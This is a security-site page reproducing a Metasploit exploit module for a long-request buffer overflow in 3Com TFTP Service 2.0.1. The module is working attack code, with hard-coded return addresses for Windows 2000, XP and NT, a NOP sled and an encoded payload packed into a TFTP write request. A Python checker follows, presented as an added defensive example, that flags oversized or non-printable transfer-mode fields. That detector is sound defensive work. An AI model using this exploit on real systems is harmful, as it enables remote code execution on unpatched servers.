Exploits: 3CTftpSvc Server 2.0.1 Long Request Buffer Overflow (metasploit)
Source: www.vfcocus.net  Author: LiuQixu  Published: 2009-01-14
require 'msf/core'

module Msf

class Exploits::Windows::Tftp::ThreeCeeTftpSvc_Overflow < Msf::Exploit::Remote

        include Exploit::Remote::Udp

        def initialize(info = {})
                super(update_info(info,
                        'Name'           => '3CTftpSvc Server 2.0.1 Long Request Buffer Overflow',
                        'Description'    => %q{
                                3Com TFTP Service version 2.0.1 suffers from a long type buffer
                                overflow during a write TFTP request. Does not require write access
                                to be enabled on the server.

                                Attacker controls ESI.

                                Liu Qixu of NCNIPC published this vulnerability.
                        },
                        'Author'         => 'grutz [at] jingojango.net',
                        'Version'        => '$',
                        'References'     => 
                                [ 
                                        ['URL', 'http://support.3com.com/software/utilities_for_windows_32_bit.htm'],
                                        ['BID', '21301'],
                                ],
                        'DefaultOptions' =>
                                {
                                        'EXITFUNC' => 'thread',
                                },
                        'Payload'        =>
                                {
                                        'Space'    => 440,
                                        'BadChars' => "\x00",
                                        'StackAdjustment' => -3500,
                                },
                        'Platform'       => 'win',
                        
                        'Targets'        =>
                                [
                                        ['Windows 2000 All SP English',   { 'Ret' => 0x750217ae } ], # call esi ws2help
                                        ['Windows XP SP2 English',        { 'Ret' => 0x71aa1b22 } ], # call esi ws2help
                                        ['Windows NT SP5/6 English',      { 'Ret' => 0x776a117e } ], # call esi ws2help
                                ],

                        'DefaultTarget'  => 0,
                        'Privileged'     => false,
                        'DisclosureDate' => 'Nov 27 2006'

                        ))

                        register_options(
                                [
                                                Opt::RPORT(69)
                                ], self)

        end

        def exploit
                connect_udp

                print_status("Trying target #{target.name}...")

                # TFTP write request (RFC 1350): opcode 2, a one-byte filename, a NUL,
                # then the transfer-mode field. The mode field is the one that overflows:
                # a NOP sled, the return address (call esi in ws2help), and the closing NUL.
                sploit =
                        "\x00\x02" +
                        Rex::Text.rand_text_english(1, payload_badchars) +
                        "\x00" +
                        make_nops(473) +
                        [target.ret].pack('V') +
                        "\x00"

                # Replace part of the NOP sled (from offset 9 of the datagram) with the encoded payload.
                sploit[9, payload.encoded.length] = payload.encoded

                udp_sock.put(sploit)

                disconnect_udp
        end

end
end
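A defender's counterpart to the packet layout used by the module above, as an added example that is not part of the original page or of the Metasploit module: a small Python checker that parses a TFTP read/write request and flags a transfer-mode field far longer than any legitimate mode (the module sends 473 NOP bytes plus a 4-byte return address in that field). The datagrams used are constructed, and MAX_MODE_LEN is an assumed threshold.

```python
import struct

# TFTP opcodes and transfer modes from RFC 1350.
OP_RRQ, OP_WRQ = 1, 2
KNOWN_MODES = {b"netascii", b"octet", b"mail"}
# Assumed threshold: the longest legitimate mode ("netascii") is 8 bytes;
# the 3CTftpSvc 2.0.1 module above sends several hundred bytes here.
MAX_MODE_LEN = 8


def parse_request(datagram: bytes) -> dict:
    """Parse a TFTP RRQ/WRQ: opcode(2) | filename NUL | mode NUL [| options...]."""
    if len(datagram) < 4:
        raise ValueError("datagram too short for a TFTP request")
    (opcode,) = struct.unpack("!H", datagram[:2])
    if opcode not in (OP_RRQ, OP_WRQ):
        raise ValueError(f"not a read/write request (opcode {opcode})")
    fields = datagram[2:].split(b"\x00")
    # A well-formed request yields filename, mode, and the remainder after the final NUL.
    if len(fields) < 3:
        raise ValueError("request is missing a NUL-terminated filename or mode")
    return {"opcode": opcode, "filename": fields[0], "mode": fields[1]}


def check_request(datagram: bytes) -> list:
    """Return a list of findings for one datagram (empty when it looks benign)."""
    findings = []
    try:
        req = parse_request(datagram)
    except ValueError as exc:
        return [f"malformed: {exc}"]
    mode = req["mode"]
    if len(mode) > MAX_MODE_LEN:
        findings.append(f"oversized mode field ({len(mode)} bytes): "
                        "matches the 3CTftpSvc 2.0.1 overflow pattern")
    elif mode.lower() not in KNOWN_MODES:
        findings.append(f"unknown transfer mode {mode!r}")
    # Legitimate modes are printable ASCII; NOP sleds and shellcode are not.
    if any(b < 0x20 or b > 0x7E for b in mode):
        findings.append("non-printable bytes in mode field")
    return findings


if __name__ == "__main__":
    # Constructed samples: a normal write request and one shaped like the module's packet.
    samples = [b"\x00\x02file.txt\x00octet\x00", b"\x00\x02A\x00" + b"\x90" * 477 + b"\x00"]
    for dgram in samples:
        print(len(dgram), "bytes ->", check_request(dgram) or "ok")
```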

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved